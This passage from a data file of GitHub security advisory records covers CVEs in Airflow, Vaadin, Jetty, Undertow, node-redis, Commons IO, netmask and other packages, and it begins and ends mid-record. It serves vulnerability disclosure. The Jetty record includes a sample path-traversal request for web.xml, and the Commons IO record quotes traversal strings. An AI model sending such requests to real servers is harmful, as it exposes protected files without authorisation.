a privilege escalation attack. This issue affects Apache Airflow 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26559'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/blob/486b76438c0679682cf98cb88ed39c4b161cbcc8/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b3787700279ec361308cbefb7c2cce2acb26891a12ce864e4a13c8d%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd142565996d7ee847b9c14b8a9921dcf80bc6bc160e3d9dca6dfc2f8@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/02/17/1'}]","{'cwe_ids': ['CWE-269', 'CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T23:27:01Z', 'nvd_published_at': '2021-02-17T15:15:00Z'}" +1.4.0,GHSA-rjww-2x8v-m9v9,2022-09-21T19:31:15Z,2021-04-19T14:52:14Z,,['CVE-2020-36319'],Potential sensitive data exposure in applications using Vaadin 15,"Insecure configuration of default `ObjectMapper` in `com.vaadin:flow-server` versions 3.0.0 through 3.0.5 (Vaadin 15.0.0 through 15.0.4) may expose sensitive data if the application also uses e.g. `@RestController` + +- https://vaadin.com/security/cve-2020-36319","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-rjww-2x8v-m9v9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36319'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/8016'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/8051'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2020-36319'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:16:31Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-v7ff-8wcx-gmc5,2022-04-17T16:45:25Z,2021-04-06T17:31:01Z,,['CVE-2021-28164'],Authorization Before Parsing and Canonicalization in jetty,"Release 9.4.37 introduced a more precise implementation of [RFC3986](https://tools.ietf.org/html/rfc3986#section-3.3) with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the `WEB-INF` directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the `web.xml` file. This can reveal sensitive information regarding the implementation of a web application. Workarounds found by HttpCompliance mode RFC7230_NO_AMBIGUOUS_URIS can be enabled by updating `start.d/http.ini` to include: jetty.http.compliance=RFC7230_NO_AMBIGUOUS_URIS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.37'}, {'fixed': '9.4.39'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28164'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html'}]","{'cwe_ids': ['CWE-200', 'CWE-551', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T20:28:10Z', 'nvd_published_at': '2021-04-01T15:15:00Z'}" +1.4.0,GHSA-cccf-7xw3-p2vr,2022-02-11T21:12:25Z,2021-04-30T17:28:33Z,,['CVE-2020-10719'],HTTP Request Smuggling in Undertow,"A flaw was found in Undertow in versions before 2.1.1.Final, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10719'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10719'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0014/'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:37:37Z', 'nvd_published_at': '2020-05-26T16:15:00Z'}" +1.4.0,GHSA-xwg3-qrcg-w9x6,2021-04-23T17:17:16Z,2021-04-19T14:51:25Z,,['CVE-2021-31404'],"Timing side channel vulnerability in UIDL request handler in Vaadin 10, 11-14, and 15-18","Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:flow-server` versions 1.0.0 through 1.0.13 (Vaadin 10.0.0 through 10.0.16), 1.1.0 prior to 2.0.0 (Vaadin 11 through 13), 2.0.0 through 2.4.6 (Vaadin 14.0.0 through 14.4.6), 3.0.0 prior to 5.0.0 (Vaadin 15 prior to 18), and 5.0.0 through 5.0.2 (Vaadin 18.0.0 through 18.0.5) allows attacker to guess a security token via timing attack. + +- https://vaadin.com/security/cve-2021-31404","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '5.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-xwg3-qrcg-w9x6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31404'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/9875'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31404'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:16:19Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-35q2-47q7-3pc3,2022-08-11T00:21:37Z,2021-04-27T15:56:03Z,,['CVE-2021-29469'],Node-Redis potential exponential regex in monitor mode,"### Impact +When a client is in monitoring mode, the regex begin used to detected monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service. + +### Patches +The problem was fixed in commit [`2d11b6d`](https://github.com/NodeRedis/node-redis/commit/2d11b6dc9b9774464a91fb4b448bad8bf699629e) and was released in version `3.1.1`. + +### References +#1569 (GHSL-2021-026)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeRedis/node-redis/security/advisories/GHSA-35q2-47q7-3pc3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29469'}, {'type': 'WEB', 'url': 'https://github.com/NodeRedis/node-redis/commit/2d11b6dc9b9774464a91fb4b448bad8bf699629e'}, {'type': 'WEB', 'url': 'https://github.com/NodeRedis/node-redis/releases/tag/v3.1.1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0010/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-23T18:11:39Z', 'nvd_published_at': '2021-04-23T18:15:00Z'}" +1.4.0,GHSA-gwrp-pvrq-jmwv,2022-02-08T21:31:42Z,2021-04-26T16:04:00Z,,['CVE-2021-29425'],Path Traversal and Improper Input Validation in Apache Commons IO,"In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like ""//../foo"", or ""\\..\foo"", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus ""limited"" path traversal), if the calling code would use the result to construct a path value.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'commons-io:commons-io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29425'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/IO-556'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-20', 'CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-26T15:21:31Z', 'nvd_published_at': '2021-04-13T07:15:00Z'}" +1.4.0,GHSA-52qp-jpq7-6c54,2021-04-27T20:54:56Z,2021-04-29T21:52:30Z,,['CVE-2021-29476'],Insecure Deserialization of untrusted data in rmccue/requests,"### Impact +Unserialization of untrusted data. + +### Patches +The issue has been patched and users of `Requests` 1.6.0, 1.6.1 and 1.7.0 should update to version 1.8.0. + +### References +Publications about the vulnerability: +* https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress +* https://github.com/ambionics/phpggc/issues/52 +* https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/ +* https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf +* https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf +* https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf +* https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f + +Originally fixed in WordPress 5.5.2: +* https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3 +* https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/ + +Related Security Advisories: +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-28032 +* https://nvd.nist.gov/vuln/detail/CVE-2020-28032 + +Notification to the Requests repo including a fix in: +* https://github.com/rmccue/Requests/pull/421 and +* https://github.com/rmccue/Requests/pull/422 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Request](https://github.com/WordPress/Requests/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'rmccue/requests'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/WordPress/Requests/security/advisories/GHSA-52qp-jpq7-6c54'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29476'}, {'type': 'WEB', 'url': 'https://github.com/ambionics/phpggc/issues/52'}, {'type': 'WEB', 'url': 'https://github.com/rmccue/Requests/pull/421'}, {'type': 'WEB', 'url': 'https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3'}, {'type': 'WEB', 'url': 'https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf'}, {'type': 'WEB', 'url': 'https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/'}, {'type': 'WEB', 'url': 'https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf'}, {'type': 'WEB', 'url': 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/rmccue/requests/CVE-2021-29476.yaml'}, {'type': 'WEB', 'url': 'https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf'}, {'type': 'WEB', 'url': 'https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f'}, {'type': 'WEB', 'url': 'https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T20:54:56Z', 'nvd_published_at': '2021-04-27T21:15:00Z'}" +1.4.0,GHSA-4c7m-wxvm-r7gc,2022-04-01T20:21:55Z,2021-04-14T15:03:16Z,,['CVE-2021-28918'],Improper parsing of octal bytes in netmask,"Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + +:exclamation: NOTE: The fix for this issue was incomplete. A subsequent fix was made in version `2.0.1` which was assigned [CVE-2021-29418 / GHSA-pch5-whg9-qr2r](https://github.com/advisories/GHSA-pch5-whg9-qr2r). For complete protection from this vulnerability an upgrade to version 2.0.1 or later is recommended.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'netmask'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28918'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pch5-whg9-qr2r'}, {'type': 'PACKAGE', 'url': 'https://github.com/rs/node-netmask/'}, {'type': 'WEB', 'url': 'https://github.com/rs/node-netmask/blob/98294cb20695f2c6c36219a4fbcd4744fb8d0682/CHANGELOG.md#v110-mar-18-2021'}, {'type': 'WEB', 'url': 'https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md'}, {'type': 'WEB', 'url': 'https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0010/'}, {'type': 'WEB', 'url': 'https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/netmask'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T16:13:23Z', 'nvd_published_at': '2021-04-01T13:15:00Z'}" +1.4.0,GHSA-whq6-mj2r-mjqc,2021-03-29T22:11:57Z,2021-04-13T15:17:53Z,,['CVE-2019-10783'],OS Command Injection in lsof,All versions including 0.0.4 of lsof npm module are vulnerable to Command Injection. Every exported method used by the package uses the exec function to parse user input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'lsof'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10783'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LSOF-543632'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:11:57Z', 'nvd_published_at': '2020-01-29T22:15:00Z'}" +1.4.0,GHSA-hh8v-jmh3-9437,2021-04-06T21:51:28Z,2021-04-13T15:25:33Z,,['CVE-2020-8823'],Cross-site scripting in SocksJS-node,htmlfile in lib/transport/htmlfile.js in SockJS before 0.3.0 is vulnerable to Reflected XSS via the /htmlfile c (aka callback) parameter.,"[{'type': 'CVSS_V3', 'score': 